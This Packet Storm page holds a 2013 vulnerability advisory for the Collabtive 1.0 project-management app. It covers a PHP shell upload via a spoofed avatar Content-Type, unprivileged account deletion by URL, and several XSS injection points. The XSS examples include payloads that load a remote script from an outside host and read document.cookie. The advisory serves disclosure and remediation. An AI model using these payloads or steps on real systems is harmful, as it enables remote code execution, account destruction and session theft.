Exploit the possiblities

Collabtive 1.0 XSS / Shell Upload / Privilege Escalation

Collabtive 1.0 XSS / Shell Upload / Privilege Escalation
Posted Jul 22, 2013
Authored by Enrico Cinquini

Collabtive version 1.0 suffers from cross site scripting, remote shell upload, and arbitrary account deletion vulnerabilities.

tags | exploit, remote, arbitrary, shell, vulnerability, xss
MD5 | 9a36097191f1cc37a24c1725084b13c1

Collabtive 1.0 XSS / Shell Upload / Privilege Escalation

Change Mirror Download
=============================================
- Release date: July 22th, 2013
- Discovered by: Enrico Cinquini
- Severity: High
=============================================

I. VULNERABILITY
-------------------------

Collabtive multiple vulnerabilities.


II. INTRODUCTION
-------------------------

The last version of Collabtive (1.0) is affected by multiple
vulnerabilities.


IV. DESCRIPTION
-------------------------

1) UPLOAD PHP FILE INSIDE AVATAR:

In the following function:

https://hostname/secprj/manageuser.php?action=edit

it's possible to upload a php file inside avatar by modifying the
Content-Type
as following:

Content-Type: image/jpeg

The file will be uploaded inside the standard directory and encoded with a
six-characters number at the end of the file, like the following example:

https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php

It's really fast to enumerate all the possibility and to execute the file
uploaded.

This vulnerability was identified in older releases, but it's still present.



2) ACCOUNT DELETION

It's possible to delete any account from every user, by calling the
following URL:

https://hostname/secprj/manageuser.php?action=del&id=5

By setting the value "del" to parameter "action", the account with setted
ID will be
deleted, even if will apper an error message.

An "User" account with no privilege can delete all kind of account,
including Administrators.



3) CROSS SITE SCRITPING - CHAT:

The application is vulnerable to XSS attack in the managechat.php page. The
parameter affected is 'userto':

https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC="
http://ha.ckers.org/xss.js"></SCRIPT>&uid=2



4) CROSS SITE SCRITPING - TIMETRACKER

The page managetimetracker.php is affected by Cross Site Scripting
vulnerability.
The POST parameters 'start' and 'end' are vulnerable, for example, to the
following XSS:

"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>



5) CROSS SITE SCRITPING - Multiple vulnerabilities:

The application is vulnerable to XSS attack in different pages:

manageproject.php
managemilestone.php
managetask.php
managemessage.php

To exploit the vulnerability it's necessary to set a new object name
(project, milestone,
task, message) like the following example:

"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

the script will be executed in the same page, and in dashboard,too.



6) CROSS SITE SCRITPING - PROFILE

The page manageuser.php?action=editform is affected by Cross Site Scripting
vulnerability.
All the profile fields are vulnerable, for example, to the following
injection:

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>


VI. BUSINESS IMPACT
-------------------------

An attacker could upload malicious file, delete accounts and perform XSS
attacks.


VII. SYSTEMS AFFECTED
-------------------------

Version 1.0 is vulnerable.


VIII. SOLUTION
-------------------------

It's necessary to:

- implement a strong upload filter to prevent the upload of malicious file

- implement an input validation mechanism to avoid being vulnerable to XSS
injection

- review and correct users profiling to prevent a user can delete other
accounts


IX. REFERENCES
-------------------------

Collabtive website:

http://collabtive.o-dyn.de


X. CREDITS
-------------------------

The vulnerability has been discovered by:

Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com


XI. VULNERABILITY HISTORY
-------------------------

June 20th, 2013: Vulnerability identification
June 21th, 2013: Vendor notification
July 22th, 2013: Vulnerability disclosure


XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse
of this information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    7 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close